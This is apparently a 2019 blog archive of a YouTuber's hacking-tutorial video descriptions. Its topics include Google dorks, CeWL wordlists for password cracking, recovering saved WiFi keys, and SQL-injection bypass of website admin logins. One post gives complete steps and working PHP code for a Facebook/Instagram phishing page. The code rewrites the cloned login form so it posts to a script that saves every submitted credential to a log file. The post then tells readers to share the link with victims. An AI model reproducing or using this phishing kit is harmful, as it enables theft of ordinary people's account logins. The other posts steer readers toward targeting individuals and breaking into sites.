Breaking

Thursday, March 21, 2019

Thursday, March 21, 2019

LATEST GOOGLE DORKS PRACTICAL || What is Google Dork| HOW TO USE GOOGLE ...





LATEST GOOGLE DORKS PRACTICAL || What is Google Dork-FAIZAN ALI

🕵DISCLAIMER:Any actions and or activities related to the material contained within this Website is solely your responsibility.The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors and Kali Tutorials will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.

👇SUBSCRIBE
www.youtube.com/faizanalihackvines

👋Hey Guys

As you know google is a very powerful search engine,so there are some tricks that is very important to learn called google dorks,
you should know how to use GOOGLE DORKS.

GOOGLE DORKS IS A SEARCHING TECHNIQUE WHICH IS USED TO SORT AND SEARCH A SPECIFIC OBJECTS.

A Google dork query, sometimes just referred to as a dork, is a search string that uses advanced search operators to find information that is not readily available on a website. Google dorking, also known as Google hacking, can return information that is difficult to locate.

I hope you guys learn from this course and share it with everyone.

DON'T FORGET TO SUBSCRIBE TO MY CHANNEL.

MY INSTAGRAM ID:
https://www.instagram.com/faizann_ali/

facebook page;
https://www.facebook.com/pg/hackvines.faizan

                                                   LIKE👍
                                              COMMENT🗣
                                                 SHARE👬👫
                                             SUBSCRIBE✌🤘

Tuesday, March 12, 2019

Tuesday, March 12, 2019

INSTAGRAM AND FACEBOOK LATEST PHISHING PAGE || HOW TO CREATE INSTAGRAM/F...





HOW TO CREATE INSTAGRAM/FACEBOOK PHISHING PAGE 2019

INSTAGRAM AND FACEBOOK LATEST PHISING PAGE

🕵DISCLAIMER:Any actions and or activities related to the material contained within this Website is solely your responsibility.The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors and Kali Tutorials will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.

👇SUBSCRIBE
https://www.youtube.com/faizanalihackvines

👋Hey Guys in this video i am telling you about
INSTAGRAM AND FACEBOOK LATEST PHIShing

So basically i get a lot of request on making a instagram and facebook phishing page so that everyone can do facebook and instagram hacking stuff.



Making a facebook phishing page is but when we try making instagram page then it is difficult task.











So, i make a video on my channel for both of them.






STEPS TO CREATE A FACEBOOK PAGE





STEP1:GO TO OFFICIAL FACEBOOK WEBSITE.

STEP2:RIGHT CLICK ON THE PAGE AND THEN CLICK ON PAGE SOURCE.

STEP3:COPY THIS SOURCE CODE AND SAVE IT AS index.htm

STEP4:OPEN index.htm AND PRESS CTRL+F.

STEP5:WRITE action= ON THE FIND TAB.

STEP6:YOU WILL FIND 3 RESULTS CHANGE THE FIRST action="https://www.facebook.com/......" TO action="post.php".

STEP7:SAVE IT.

STEP8:PASTE THE BELOW CODE IN NOTEPAD AND SAVE IT AS post.php

CODE>>>

 <?php
header ('Location: https://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n\n\n\n");
fclose($handle);
exit;
?>


STEP9:UPLOAD THESE 2 FILES ON SERVER.

STEP10.SHARE YOUR LINK AND THEN DONE.VOILLA !!



 DROP A  COMMENT AND LIKE ON VIDEO TO GET THE LINK.


I hope you guys learn from this video and share it with everyone.

DON'T FORGET TO SUBSCRIBE TO MY CHANNEL.

MY INSTAGRAM ID:
https://www.instagram.com/faizann_ali/


facebook page;
https://www.facebook.com/pg/hackvines.faizan

                                                   LIKE👍
                                              COMMENT🗣
                                                 SHARE👬👫
                                             SUBSCRIBE✌🤘






Thursday, March 07, 2019

Thursday, March 07, 2019

TRUTH-HOW HACKERS HACK FACEBOOK AND INSTAGRAM ACCOUNT| IS IT POSSIBLE ? ...





REALITY OF YOUTUBE VIDEOS BASED ON FACEBOOK AND INSTAGRAM HACKING.


🕵DISCLAIMER:Any actions and or activities related to the material

contained within this Website is solely your responsibility.The misuse

of the information in this website can result in criminal charges

brought against the persons in question. The authors and Kali Tutorials

will not be held responsible in the event any criminal charges be

brought against any individuals misusing the information in this website

to break the law.


👇SUBSCRIBE

https://www.youtube.com/channel/UCjxD...


👋Hey Guys in this video i am telling about the sad reality of

youtube videos and a massive question asked by a person to a tech guys.





IT IS NOT POSSIBLE TO HACK FACBOOK LIKE IT SEEMS IN MOVIES,
NO WEBSITE PROVIDE THESE SERVICES.

If you find any of these website or videos just report them or either not use.
 They create these websites to get a high amount of views.

SO Watch this video to you will understand much more better.

I hope you guys learn something new and please share it with everyone.

DON'T FORGET TO SUBSCRIBE TO MY CHANNEL.


MY INSTAGRAM ID:

https://www.instagram.com/faizann_ali/

facebook page;

https://www.facebook.com/pg/hackvines...

LIKE👍

COMMENT🗣

SHARE👬👫

SUBSCRIBE✌🤘

Monday, March 04, 2019

Monday, March 04, 2019

TECHNICAL SAGAR COURSE REVIEW || BUY OR NOT? || EXPOSED [NEW]








Please watch: "Ep 2|| VIRTUAL LAB CONCEPT EXPLAINED || 2018 Ceh"


#technical_sagar #faizarmy
Hey guys faizan is back with a new channel and this time again i came up with good thoughts to help people i know in return i will not get anything from you guys.

INSTA:@faizann_ali

DISCLAIMER:THIS VIDEO IS JUST BASED ON MY REVIEWS PEOPLE HAVE DIFFERENT OPINIONS BUT ONE HAS TO COME FORWARD TO SHOW THE RIGHT PATH,
I DON'T WANT ANY FIGHTS OR DISPUTES.

IN THIS VIDEO I AM SUGGESTING YOU ABOUT TECHNICAL SAGAR HAKING COURSE,WHETHER YOU SHOULD BUT OR NOT??

DID HE LOOTS PEOPLE.
SO HERE IS THE SAD TRUTH SO HOPE YOU LIKE THIS VIDEO PLEASE MAKE SURE TO
                                            LIKE
                                          SHARE
                                      SUBSCRIBE
                                       COMMENT
SEE YOU IN THE NEXT VIDEO PEACE :)

Saturday, February 09, 2019

Saturday, February 09, 2019

EP 11-HOW TO MAKE CUSTOM WORDLIST IN KALI LINUX| HOW TO MAKE WORDLIST US...


HOW TO MAKE CUSTOM WORDLIST IN KALI LINUX| HOW TO MAKE WORDLIST USING WINDOWS || CEWL

🕵DISCLAIMER:Any actions and or activities related to the material contained within this Website is solely your responsibility.The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors and Kali Tutorials will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.

👇SUBSCRIBE


👋Hey Guys in this video i am delivering an intro about what you will find this course and what is ethical hacking?


CeWL - Custom Word List generator
Based on a discussion on PaulDotCom episode 129 about creating custom word lists by spidering a targets website and collecting unique words I decided to write CeWL, the Custom Word List generator. CeWL is a ruby app which spiders a given url to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper.

CeWL also has an associated command line app, FAB (Files Already Bagged) which uses the same meta data extraction techniques to create author/creator lists from already downloaded.

The Practical Usage of CeWL

CeWL is a very useful utility that is written in Ruby. It allows you to create custom wordlists, which are used for cracking passwords, based on a specified URL. The utility will “crawl” the specified site, as well as any links on the site to the depth you specify, and return a list of words from that site. You can filter the returned wordlist to include only words of a certain length of your choosing. It comes installed with Kali Linux by default.
Humans are creatures of habit, and tend to use real words as a basis for their passwords. Often, they tend to use words based on what they like, or words that are associated with hobbies, or their occupation. Mining this information when targeting a specific individual is typically pretty simple, since everyone tends to publicly
Now that we know what CeWL is, and what it’s used for, let’s see how it works. CeWL is able to take several parameters, all of which are listed with the command:

cewl -h

In its basic form, CeWL is a very powerful tool that can be used with a fairly small set of parameters. Of use to us in this example will be to set a minimum word size (5 letters is a good place to start), an output file that will contain all of our words, the depth of links that we want CeWL to crawl (if not specified this default to 2 links deep), and a URL to crawl.

A couple of parameters to really think about here are the word size and the depth of links that we’re going to crawl. Personally, I like to start with a word size of 5 at a minimum. Typically, passwords are required to be 7 or 8 letters in length, so a user is fairly unlikely to pick a 3 or 4 letter word as a root word to their password. 5 characters is a good place to start, and to make the list smaller, you could start with 6 or 7 letters if you thought that’d be best. Experimentation is king here and everyone has their own technique.

The second big decision to make with CeWL is how many links deep we want to crawl. Say, for example, if you leave this at the default of two links. Specifying two links deep essentially tells CeWL “Crawl the page I specify… all of the links on that page… and then all of the links on each of those pages, and then stop.

Another parameter that you may include is the -o flag. This takes no value, and if set, simply tells CeWL that it’s ok to follow off-site links. If this isn’t specified, CeWL will keep its searches on-site only with the URL you specify. So, if for example you specify a Wikipedia.org URL to CeWL, CeWL won’t follow the many off-site reference links at the bottom of the page.

For this example, let’s assume that we’re targeting an individual. We’ve obtained the password hash to their user account, WPA2 key, etc. and we know by browsing their open social media profiles that they are infatuated with the series Game of Thrones. We might use a command like this to generate a CeWL wordlis
I hope you guys learn from this course and share it with everyone.

DON'T FORGET TO SUBSCRIBE TO MY CHANNEL.

MY INSTAGRAM ID:
https://www.instagram.com/faizann_ali/

facebook page;
https://www.facebook.com/pg/hackvines.faizan

LIKE👍
COMMENT🗣
SHARE👬👫
SUBSCRIBE✌🤘

Saturday, January 26, 2019

Saturday, January 26, 2019

HOW TO VIEW SAVED WiFi PASSWORDS Using Computer| WiFi Password Recovery ...











#wifipassword #faizanhackvines HOW TO VIEW SAVED WIFI PASSWORDS Using Computer|| 2019

🕵DISCLAIMER:Any actions and or activities related to the material contained within this Website/video is solely your responsibility.The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors and Kali Tutorials will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website/videos to break the law.



👇SUBSCRIBE



👋Hey Guys in this video WE ARE EXPLAINING HOW TO #VIEW #SAVED #WiFiPASSWORDS Using Computer| #WiFi #Password #Recovery #Tool #windows10 WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer by the 'Wireless Zero Configuration' service of Windows XP or by the 'WLAN AutoConfig' service of Windows Vista, Windows 7, Windows 8, Windows 10, and Windows Server 2008. It allows you to easily save all keys to text/html/xml file, or copy a single key to the clipboard. You can also export your wireless keys into a file and import these keys into another computer.





Using WirelessKeyView



WirelessKeyView doesn't require any installation process or additional DLL files. Just copy the executable file (WirelessKeyView.exe) to any folder you like, and run it. After you run it, the main window should displayed all WEP/WPA keys stored in your computer by Windows 'Wireless Zero Configuration' service. For WEP keys, the key is also displayed in Ascii form. Be aware that this utility can only reveal the network keys stored by Windows operating system. It cannot recover network keys stored by any other third-party software. hope you guys learn from this course and share it with everyone.

DON'T FORGET TO SUBSCRIBE TO MY CHANNEL.



 MY INSTAGRAM ID: https://www.instagram.com/faizann_ali/ facebook page; https://www.facebook.com/pg/hackvines... LIKE👍 COMMENT🗣 SHARE👬👫 SUBSCRIBE✌🤘

Saturday, January 19, 2019

Saturday, January 19, 2019

[PRACTICAL] HOW TO BYPASS ADMIN CONTROL PANEL OF A WEBSITE|| WHY SQL INJ...





Published on Jan 19, 2019
#ADMIN_LOGIN_BYPASS OF A WEBSITE [FULL PRACTICAL] | #SQL_INJECTION BYPASS WITHOUT USERNAME & PASSWORD [PRACTICAL] HOW TO BYPASS ADMIN CONTROL PANEL OF A WEBSITE|| SQL INJECTION 🕵DISCLAIMER:Any actions and or activities related to the material contained within this Website/channel is solely your responsibility.The misuse of the information in this website/channel can result in criminal charges brought against the persons in question. The authors and Kali Tutorials will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in any website to break the law.

👇SUBSCRIBE https://www.youtube.com/watch?v=3n3AHyjpQv0#action=share



 👋AYOOO WHAT UP HACKVINERS-FAIZAN BACK HERE WITH A NEW VIDEO IN THIS VIDEO I AM GOING TO TEACH YOU GUYS HOW TO BYPASS ADMIN LOGIN PANEL OF A WEBSITE USING THIS YOU CAN CREATE A LOT OF CHANGES ON A WEBSITE THIS IS JUST A DEMO MANY MORE INTRESTING VIDEOS HAS TO COME.. At first you have to find a vulnerable site using DORKS. IF YOU DONT KNOW HOW TO DO THAT YOU CAN WATCH MY VIDEO...................... ========================================= AFTER THAT OPEN WEBSITE ADMIN PANEL AND USED ONE OF THE DORKS THE MAIN AIM IS TO CREATE A TRUE QUERY SO THAT YOU WILL GET #AUTHENTICATE BY THE BACK-END SERVER. SO IF YOU GUYS THINK YOU HAD LEARN SOMETHING AND YOU WANT TO LEARN MORE ABOUT INTERNET SECURITY JUST HIT THAT RED SUBSCRIBE BUTTON. ====================================================

                                                *LIKE*

==================================================== ------------------------------------------------------------------------------------------------------

                      *COMMENT* *SHARE* *SUBSCRIBE*



I hope you guys learn from this course and share it with everyone. DON'T FORGET TO SUBSCRIBE TO MY CHANNEL. MY INSTAGRAM ID: https://www.instagram.com/faizann_ali/